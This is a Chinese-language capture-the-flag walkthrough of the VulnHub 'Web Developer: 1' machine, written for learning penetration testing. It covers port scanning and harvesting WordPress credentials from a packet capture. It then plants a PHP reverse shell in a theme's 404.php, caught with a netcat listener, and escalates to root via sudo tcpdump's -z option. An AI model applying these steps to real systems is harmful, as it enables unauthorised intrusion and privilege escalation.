靶机地址:Web Developer: 1 ~ VulnHub
文章主要是简要记录每一个过程,没有专门地对每一步截图,也许有些步骤中并不详细,会在文末附上相关详细的渗透文章
主机探测&端口扫描
靶机ip为 192.168.31.118
端口扫描结果:
22和80端口
>> nmap -A -p- -T5 -sV 192.168.31.118
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-26 23:29 CST
Nmap scan report for 192.168.31.118
Host is up (0.00039s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d2:ac:73:4c:17:ec:6a:82:79:87:5a:f9:22:d4:12:cb (RSA)
| 256 9c:d5:f3:2c:e2:d0:06:cc:8c:15:5a:5a:81:5b:03:3d (ECDSA)
|_ 256 ab:67:56:69:27:ea:3e:3b:33:73:32:f8:ff:2e:1f:20 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 4.9.8
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Example site – Just another WordPress site
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.26 seconds
信息搜集
- 目录爆破
发现有一个ipdata目录,前往192.168.31.118/ipdata
dirb http://192.168.31.118
-
.cap文件
使用WireShark分析.cap文件
针对HTTP和POST两个关键词搜到180和665两条信息
180的信息中包含用户webdevelop的登录信息Form item: "log" = "webdeveloper" Form item: "pwd" = "Te5eQg&4sBS!Yr$)wf%(DcAd"
权限获取
思路一:文件上传(404.php页面)
- 在下面404.php文件处写入反向连接的代码(见第2步),并保存
- 反向连接的代码,需要修改其中的ip为本机kali的ip,端口默认为1234
cp /usr/share/webshells/php/php-reverse-shell.php .
- 写入完成后,在kali上监听端口
nc -lvp 1234
- 访问页面,回到kali,可以看到已经获取到权限了,
192.168.31.118/wp-content/themes/twentysixteen/404.php
思路二:文件上传(插件处上传)
参考:Root Network Security (rootnetsec.com)
权限提取
在获取到的低权限用户中可以访问到敏感文件wp-config.php,里面存储着数据库用户名和密码,尝试进行连接
/** MySQL database username */
define('DB_USER', 'webdeveloper');
/** MySQL database password */
define('DB_PASSWORD', 'MasterOfTheUniverse');
登录进去后通过下面的命令,查看自己执行sudo后的权限,发现可以执行tcpdump
sudo -l
(root) /usr/sbin/tcpdump
思路一:通过root执行tcpdump指令获取flag.txt
- 在该用户中创建文件
touch /tmp/exploit
- 写入shellcode
echo 'cat /root/flag.txt' > /tmp/exploit
- 赋予该文件执行权限
chmod +x /tmp/exploit
- 执行tcpdump指令,得到flag.txt
sudo tcpdump -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root
上面这行代码的具体含义还不是很清楚
tcpdump命令详解:
- -i eth0 从指定网卡捕获数据包
- -w /dev/null 将捕获到的数据包输出到空设备(不输出数据包结果)
- -W [num] 指定抓包数量
- -G [rotate_seconds] 每rotate_seconds秒一次的频率执行-w指定的转储
- -z [command] 运行指定的命令
- -Z [user] 指定用户执行命令
总结
-
WireShark使用
分析.cap文件,每一条的详细信息
ARP(Address Resolution Protocol)
TCP(Transmission Control Protocol)
HTTP(Hypertext Transfer Protocol) -
Vim的使用
复制粘贴等 -
交互式tty
python -c 'import pty;pty.spawn("/bin/bash")优点:显示友好,有历史记录等等
参考
Root Network Security (rootnetsec.com)
No.29-VulnHub-Web Developer: 1-Walkthrough渗透学习-CSDN博客
(2条消息) Vulnhub靶机渗透测试实战(二):Web Developer: 1_Jenny_Zhx的博客-CSDN博客